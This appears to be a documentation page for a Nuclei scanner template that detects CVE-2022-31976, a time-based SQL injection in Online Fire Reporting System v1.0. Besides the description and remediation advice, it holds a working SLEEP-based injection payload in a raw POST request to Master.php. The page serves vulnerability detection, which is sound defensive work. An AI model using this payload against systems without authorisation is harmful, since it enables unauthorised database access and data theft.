Online Fire Reporting System v1.0 - SQL injection
ID: CVE-2022-31976
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
Description
Section titled “Description”Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.
YAML Source
Section titled “YAML Source”id: CVE-2022-31976
info: name: Online Fire Reporting System v1.0 - SQL injection author: theamanrawat severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31976 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 epss-score: 0.02266 epss-percentile: 0.89602 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http: - raw: - | @timeout: 10s POST /classes/Master.php?f=delete_request HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and# digest: 490a00463044022041185b7b3952a54d3396ec8d7577a9eb6241ac11c526ce872295048753c5cc640220096981351d912f6674dbc4f3f13b3a8deb348da142a903d99e2d1f06c1e31797:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-31976.yaml"